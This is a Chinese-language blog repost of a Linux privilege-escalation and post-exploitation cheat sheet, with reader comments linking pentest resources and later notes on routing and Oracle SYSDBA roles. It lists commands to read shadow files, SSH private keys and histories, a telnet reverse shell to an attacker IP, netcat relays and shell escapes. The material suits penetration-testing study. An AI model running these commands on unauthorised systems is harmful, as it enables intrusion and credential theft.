先提前说一句:文章是很早之前就看到的,在Freebuf.com/91Ri.org等网站上都有看到过,这时放在这里,一方面是作为一个知识存储进行备份,另一方面也偷个懒,写不出这么好的文章就先转载学习吧~
PS:文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的Linux中所使用的命令。
列举关键点
(Linux)的提权是怎么一回事:
- 收集 – 枚举,枚举和一些更多的枚举。
- 过程 – 通过数据排序,分析和确定优先次序。
- 搜索 – 知道搜索什么和在哪里可以找到漏洞代码。
- 适应 – 自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。
- 尝试 – 做好准备,试验和错误。
操作类型
操作类型是什么版本?
cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release
它的内核版本是什么?
cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz
它的环境变量里有些什么?
cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set
是否有台打印机?
lpstat -a
应用与服务
正在运行什么服务?什么样的服务具有什么用户权限?
ps aux ps -ef top cat /etc/service
哪些服务具有root的权限?这些服务里你看起来那些有漏洞,进行再次检查!
ps aux | grep root ps -ef | grep root
安装了哪些应用程序?他们是什么版本?哪些是当前正在运行的?
ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/
Service设置,有任何的错误配置吗?是否有任何(脆弱的)的插件?
cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
主机上有哪些工作计划?
crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root
主机上可能有哪些纯文本用户名和密码?
grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
通信与网络
NIC(s),系统有哪些?它是连接到哪一个网络?
/sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network
网络配置设置是什么?网络中有什么样的服务器?DHCP服务器?DNS服务器?网关?
cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname
其他用户主机与系统的通信?
lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w
缓存?IP和/或MAC地址?
arp -e route /sbin/route -nee
数据包可能嗅探吗?可以看出什么?监听流量
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
你如何get一个shell?你如何与系统进行交互?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444 # Attacker. 输入 (命令) nc -lvp 4445 # Attacker. 输出(结果)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # 在目标系统上. 使用 攻击者的IP!
如何端口转发?(端口重定向)
# rinetd
http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP] FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] ssh -L 8080:127.0.0.1:80 [email protected] # Local Port ssh -R 8080:127.0.0.1:80 [email protected] # Remote Port
# mknod
# mknod backpipe p; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe mknod backpipe p; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay mknod backpipe p; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) mknod backpipe p; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
建立隧道可能吗?本地,远程发送命令
ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig
秘密信息和用户
你是谁?哪个id登录?谁已经登录?还有谁在这里?谁可以做什么呢?
id
who
w
last
cat /etc/passwd | cut -d: # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
可以找到什么敏感文件?
cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/
什么有趣的文件在home/directorie(S)里?如果有权限访问
ls -ahlR /root/ ls -ahlR /home/
是否有任何密码,脚本,数据库,配置文件或日志文件?密码默认路径和位置
cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg
用户做过什么?是否有任何密码呢?他们有没有编辑什么?
cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history
可以找到什么样的用户信息
cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root
private-key 信息能否被发现?
cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key
文件系统
哪些用户可以写配置文件在/ etc /?能够重新配置服务?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
在/var/里有什么可以发现?
ls -alh /var/log ls -alh /var/mail ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases
网站上的任何隐藏配置/文件?配置文件与数据库信息?
ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/
有什么在日志文件里?(什么能够帮助到“本地文件包含”?)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/ # auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp(有什么文件?log.系统引导......)
如果命令限制,你可以打出哪些突破它的限制?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
如何安装文件系统?
mount df -h
是否有挂载的文件系统?
cat /etc/fstab
什么是高级Linux文件权限使用?Sticky bits, SUID 和GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGIDorSUID, not Symbolic links, only 3 folders deep, list with more detail and hideany errors (e.g. permission denied)
find / -perm -g=s-o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null
在哪些目录可以写入和执行呢?几个“共同”的目录:/ tmp目录,/var / tmp目录/ dev /shm目录
find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o+w -type d 2>/dev/null # world-writeable folders find / -perm -o+x -type d 2>/dev/null # world-executable folders find / ( -perm -o+w -perm -o+x ) -type d 2>/dev/null # world-writeable & executable folders #Any "problem" files?可写的的,“没有使用"的文件 find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print # world-writeable files find /dir -xdev ( -nouser -o -nogroup ) -print # Noowner files
准备和查找漏洞利用代码
安装了什么开发工具/语言/支持?
find / -name perl* find / -name python* find / -name gcc* find / -name cc
如何上传文件?
find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp
查找exploit代码
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
查找更多有关漏洞的信息
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]]http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]]http://www.vulnview.com/cve-details.php?cvename=[CVE]
http://www.91ri.org/
(快速)“共同的“exploit,预编译二进制代码文件
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
上面的信息很难吗?
快去使用第三方脚本/工具来试试吧!
系统怎么打内核,操作系统,所有应用程序,插件和Web服务的最新补丁?
apt-get update && apt-get upgrade yum update
服务运行所需的最低的权限?
例如,你需要以root身份运行MySQL?
能够从以下网站找到自动运行的脚本?!
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
(快速)指南和链接
例如
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
其他
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html
《 “Linux系统提权后获取敏感信息的一些方法” 》 有 24 条评论
实战Linux下三种不同方式的提权技巧
http://bobao.360.cn/learning/detail/2984.html
http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/
https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
https://jivoi.github.io/2015/08/21/pentest-tips-and-tricks-number-2/
本地Linux 信息收集 和 提权操作 备忘单(Local Linux Enumeration & Privilege Escalation Cheatsheet)
https://www.rebootuser.com/?p=1623
Linux 入侵发现备忘册
https://jordanpotti.com/wp-content/uploads/2017/01/linux-cheat-sheet.pdf
日志审计备忘册
https://jordanpotti.com/wp-content/uploads/2017/01/Log_Review.pdf
2016年出现的各种Linux提权技术总结
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
Linux提权:从入门到放弃
http://www.freebuf.com/articles/system/129549.html
MimiPenguin – Linux 系统上的内存明文导出工具
https://github.com/huntergregal/mimipenguin
Linux Post Exploitation Command List(Linux系统后渗透阶段的命令列表)
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
Mitre 组织创建了一个称作 ATT&CK 的项目,之前有过推送,这个项目整理了攻击和入侵者常用的一些技术和策略。看到这个项目之后,来自 Veramine 团队的研究员也创建了一个项目,用于总结和讨论如何检测和防御 ATT&CK 项目中涉及的攻击技术
https://attack.mitre.org/wiki/Main_Page
https://github.com/veramine/Detections/wiki
Huge Dirty COW(CVE-2017-1000405)
http://ne2der.com/2017/HugeDirtyCOW-CVE-2017%E2%80%931000405/
https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0
https://github.com/bindecy/HugeDirtyCowPOC
Linux提权——利用可执行文件SUID
https://www.anquanke.com/post/id/86979
https://pentestlab.blog/2017/09/25/suid-executables/
`
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。那么,为什么要给Linux二进制文件设置这种权限呢?其实原因有很多,例如,程序ping需要root权限才能打开网络套接字,但执行该程序的用户通常都是由普通用户,来验证与其他主机的连通性。
但是,如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。其中,大家熟知的具有提权功能的Linux可执行文件包括:
Nmap
Vim
find
Bash
More
Less
Nano
cp
`
非 root 权限下使用 Nmap 进行 ARP 扫描的技巧
https://twitter.com/i/web/status/987002523872612352
otseca – 开源 Linux 安全审计工具,用于搜索和导出系统配置
https://github.com/trimstray/otseca
渗透测试备忘单
https://github.com/kmkz/Pentesting/blob/master/Pentest-cheat-sheet
Linux 遭入侵,挖矿进程被隐藏案例分析
https://mp.weixin.qq.com/s/1AF5cgo_hJ096LmX7ZHitA
Lin.security – 练习 Linux 提权用的虚拟机
https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/
多种系统平台的特权提升和利用相关的文章汇总
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
Linux Privilege Escalation Using PATH Variable(借助PATH变量进行Linux提权)
https://movaxbx.ru/2018/06/01/linux-privilege-escalation-using-path-variable/
Linux Privilege Escalation
https://movaxbx.ru/2018/09/19/linux-privilege-escalation/
`
Kernel exploits (内核漏洞)
Programs running as root (以root权限运行的进程)
Installed software (已安装的软件)
Weak/reused/plaintext passwords (弱密码/密码重用/明文密码)
Inside service (内部服务)
Suid misconfiguration (suid的错误配置)
Abusing sudo-rights (滥用sudo权限)
World writable scripts invoked by root (由root调用的全局可写的脚本)
Bad path configuration (错误的路径配置)
Cronjobs (定时任务)
Unmounted filesystems (卸载的文件系统)
`
Linux privilege escalation via trusted $PATH in keybase-redirector
https://hackerone.com/reports/426944
Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials
https://shenaniganslabs.io/2019/05/21/LXD-LPE.html
https://paper.tuisec.win/detail/752f8fa515866c0
https://github.com/initstring/lxd_root
https://github.com/lxc/lxd/issues/2003
https://reboare.github.io/lxd/lxd-escape.html
Linux 下如何查看当前的路由表设置(linux check route table)?
https://linuxcommando.blogspot.com/2008/05/how-to-display-routing-table.html
`
# route -n
# ip route
# netstat -rn
`
https://howto.lintel.in/how-to-check-routes-routing-table-in-linux/
https://www.rootusers.com/how-to-display-routing-table-in-linux/
Linux下如何添加、删除路由信息
`
— SIOCADDRT: Invalid argument
route add -net 172.18.0.0 netmask 255.255.0.0 gw 0.0.0.0 dev docker0
— 添加(exec ok)
route add -net 172.18.0.0 netmask 255.255.0.0 dev docker0
— 删除(exec ok)
route del -net 172.18.0.0 netmask 255.255.0.0 dev docker0
`
Linux添加临时路由及永久路由的方法
https://blog.csdn.net/sinat_31500569/article/details/70149241
路由表添加路由时报错 SIOCADDRT
https://blog.csdn.net/weixin_40981751/article/details/108229933
SYS, SYSDBA, SYSOPER, SYSTEM
https://asktom.oracle.com/pls/apex/f?p=100:11:0::::P11_QUESTION_ID:2659418700346202574
`
You Asked:
Hi I am very new to oracle.
I have installed Oracle 10g compatible with windows vista.
I am confused with what are exactly, SYS, SYSDBA, SYSOPER and SYSTEM?
How they differ and what is the specific purpose of these automatically created accounts when a new database installation is done?
Please provide me detailed information or please provide me some useful links to read about it in detail.
SYS/SYSTEM 是 schemas,正常情况下你根本用不到这个,你可以忘记它们的存在。
sysdba 角色,可以理解为Linux的root或者Windows的Administrator,即数据库里的最高权限,一般用在升级或打补丁的场景,平时用不上。
sysoper 另一个角色,有启停数据库的权限。
and Tom said:
sys and system are “real schemas”, there is a user SYS and a user SYSTEM.
In general, unless the documentation tells you, you will NEVER LOG IN as sys or system, they are our internal data dictionary accounts and not for your use. You will be best served by forgetting they exist.
sysdba and sysoper are ROLES – they are not users, not schemas. The SYSDBA role is like “root” on unix or “Administrator” on Windows. It sees all, can do all. Internally, if you connect as sysdba, your schema name will appear to be SYS.
In real life, you hardly EVER need sysdba – typically only during an upgrade or patch.
sysoper is another role, if you connect as sysoper, you’ll be in a schema “public” and will only be able to do things granted to public AND start/stop the database. sysoper is something you should use to startup and shutdown. You’ll use sysoper much more often than sysdba.
do not grant sysdba to anyone unless and until you have absolutely verified they have the NEED for sysdba – the same with sysoper.
====================
Addenda: Nov 2017
Thanks for some good additional information from Paul Alsemgeest from Netherlands to bring this content up to date:
In the versions from 12c onwards, you will also find roles SYSDG, SYSBACKUP and SYSKM.
These are somewhat less powerfull than sysdba, and meant for special user actions.
SYSDG for using Data Guard, SYSBACKUP for … yes backup actions with RMAN and such, and SYSKM for security handling with TDE (Transparant Data Encryption). If you are very strict, you can use them all. Maybe this is usefull if you have multiple DBA teams with seperate responsibilities. I have not seen it yet. If you are alone on a small environment, SYSDBA will work where DBA is not enough.
`
7.3.2 SYSDBA and SYSOPER System Privileges
https://docs.oracle.com/database/121/ADMQS/GUID-2033E766-8FE6-4FBA-97E0-2607B083FA2C.htm#ADMQS12004
`
SYSDBA and SYSOPER are administrative privileges required to perform high-level administrative operations such as creating, starting up, shutting down, backing up, or recovering the database. The SYSDBA system privilege is for fully empowered database administrators and the SYSOPER system privilege allows a user to perform basic operational tasks, but without the ability to look at user data.
The SYSDBA and SYSOPER system privileges allow access to a database instance even when the database is not open. Control of these privileges is therefore completely outside of the database itself. This control enables an administrator who is granted one of these privileges to connect to the database instance to start the database.
You can also think of the SYSDBA and SYSOPER privileges as types of connections that enable you to perform certain database operations for which privileges cannot be granted in any other way. For example, if you have the SYSDBA privilege, then you can connect to the database using AS SYSDBA.
The SYS user is automatically granted the SYSDBA privilege upon installation. When you log in as user SYS, you must connect to the database as SYSDBA or SYSOPER. Connecting as a SYSDBA user invokes the SYSDBA privilege; connecting as SYSOPER invokes the SYSOPER privilege. EM Express allows you to log in as user SYS and connect as SYSDBA or SYSOPER.
When you connect with the SYSDBA or SYSOPER privilege, you connect with a default schema, not with the schema that is generally associated with your user name. For SYSDBA this schema is SYS; for SYSOPER the schema is PUBLIC.
`